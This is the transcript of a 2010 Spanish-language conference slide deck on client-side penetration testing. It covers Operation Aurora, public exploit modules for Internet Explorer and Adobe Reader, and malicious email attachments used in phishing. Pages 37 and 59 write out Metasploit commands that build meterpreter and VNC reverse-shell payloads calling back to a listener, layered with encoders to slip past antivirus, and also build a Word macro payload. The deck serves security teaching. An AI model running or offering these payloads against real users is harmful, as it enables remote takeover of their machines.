what works on client side pentesting

64
What Work’s On Client Side Pentesting CAMPUS PARTY COLOMBIA 2010 I’m a User I’m a Pentester

Upload: leonardo-pigner

Post on 13-Jul-2015

1.341 views

Category:

Technology


4 download

TRANSCRIPT

Page 1: What works on client side pentesting

What Work’s OnClient Side Pentesting

CAMPUS PARTY COLOMBIA 2010

I’m a UserI’m a Pentester

Page 2: What works on client side pentesting

Leonardo Pigñer

www.base4sec.com

@base4sec

Page 4: What works on client side pentesting
Page 5: What works on client side pentesting

ekoparty.org16-17 Septiembre 2010

Page 6: What works on client side pentesting

Agenda

• ¿ Por Qué Client Side ?

• La Operación Aurora

• Distribución y Ataques

• Conclusión

Page 7: What works on client side pentesting

¿ Por Qué Client Side ?

Page 8: What works on client side pentesting

DIFERENTES TIPOS DE PENETRATION TESTING

Phone Attacker

Wardialinges lo mejor!

Network Attacker

No! Yo tengo un 0-day para

IIS 6.0!

Social Engineer

Jodanse!Yo entro

caminando

Page 9: What works on client side pentesting

DMZ

LAN

DOMINIO

SMTP WWW

Firewall

ATACANTE

INTERNET

BASE DEDATOS

Page 10: What works on client side pentesting

DMZ

LAN

DOMINIO

SMTP WWW

Firewall

INTERNET

BASE DEDATOS

IPSReverse Proxy

IDS

Web App FW

ATACANTE

Page 11: What works on client side pentesting

DMZ

LAN

Firewall

ATACANTE

INTERNET

Page 12: What works on client side pentesting
Page 13: What works on client side pentesting
Page 14: What works on client side pentesting
Page 15: What works on client side pentesting

Agenda

• ¿ Por Qué Client Side ?

• La Operación Aurora

• Distribución y Ataques

• Conclusión

Page 16: What works on client side pentesting

La Operación Aurora

Page 17: What works on client side pentesting

12 de Enerode 2010

[2] Google Blog: A new approach to China

“ataques altamente sofisticados y dirigidos ... originados desde China”

Page 18: What works on client side pentesting

+ 30[1] Wikipedia: Operation Aurora

Page 19: What works on client side pentesting

“Operación Aurora”

Page 20: What works on client side pentesting

Google se va de China (?)

Page 21: What works on client side pentesting

Google.cn

Page 22: What works on client side pentesting

Google.com.ar

Page 23: What works on client side pentesting

“illegal flower

tribute”

[4] Wikipedia: Illegal flower tribute

Page 24: What works on client side pentesting

Texas

Taiwan

PDF, DOC, XLS, CAD, E-mail

CAB, RAR

[3] Mandiant M-Trends “the advanced persistent threat”

y el resto...

Page 25: What works on client side pentesting
Page 26: What works on client side pentesting

0-day para IE 6-7-8

[6] Wepawet exploit[7] German government warns against using MS Explorer

- 12 de Enero: Anuncio de Google

- 14 de Enero: Exploit en Wepawet

- 14 de Enero: Advisory de Microsoft

- 15 de Enero: PoC de MetaSploit

- 21 de Enero: Microsoft update (fuera de ciclo)

Page 27: What works on client side pentesting

DEMO #1 “Aurora”

www

Mas información en:

KUNGFOOSION: Estalló la CyberGuerra!

Page 28: What works on client side pentesting

OSVDB 61697This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.

Afecta a:- Internet Explorer 6- Internet Explorer 7- Internet Explorer 8

Page 29: What works on client side pentesting

Agenda

• ¿ Por Qué Client Side ?

• La Operación Aurora

• Distribución y Ataques

• Conclusión

Page 30: What works on client side pentesting

Distribución y Ataques

Page 31: What works on client side pentesting
Page 32: What works on client side pentesting
Page 33: What works on client side pentesting
Page 34: What works on client side pentesting
Page 35: What works on client side pentesting
Page 36: What works on client side pentesting

payload+

encoding

Page 37: What works on client side pentesting

DEMO #2 “Payload + Encoding”

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 X > payload_1.exe

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 3 -t exe -o payload_2.exe

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 E

Page 38: What works on client side pentesting

Tienes un E-Mail

Page 39: What works on client side pentesting
Page 40: What works on client side pentesting
Page 41: What works on client side pentesting

CASO de ESTUDIO (?)

Page 42: What works on client side pentesting
Page 43: What works on client side pentesting

25000 mails

1883 interesados

Page 44: What works on client side pentesting

Browsers

Page 45: What works on client side pentesting

SistemaOperativo

Page 46: What works on client side pentesting

Soporte de Java

Page 47: What works on client side pentesting

Versionesde Flash

Page 48: What works on client side pentesting

Tienes un E-Mail

Abre miadjunto!

Page 49: What works on client side pentesting
Page 50: What works on client side pentesting
Page 51: What works on client side pentesting

Archivos Mas Utilizados

38%

7%4%

47%

3%

DOC XLS PPTPDF otros

Page 52: What works on client side pentesting

[8] PDF Based Target Attacks are Increasing

2008

1968

2009

2195

2010

895

Page 54: What works on client side pentesting

OSVDB 61697This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.

Afecta a:- Adobe Reader 8.1.2

Page 56: What works on client side pentesting

+ EXE

Page 57: What works on client side pentesting

[8] PDF Based Target Attacks are Increasing

2008

1968

2009

2195

2010

895

Page 58: What works on client side pentesting

DEMO #5 “Word”

Page 59: What works on client side pentesting

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 V > macro_word.bas

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 E

DEMO #5 “Word”

Page 60: What works on client side pentesting
Page 61: What works on client side pentesting

La Recepcionista

Page 62: What works on client side pentesting

DEMO #6 “USB U3”Mas información en:

KUNGFOOSION: Ataque USB U3 con MetaSploit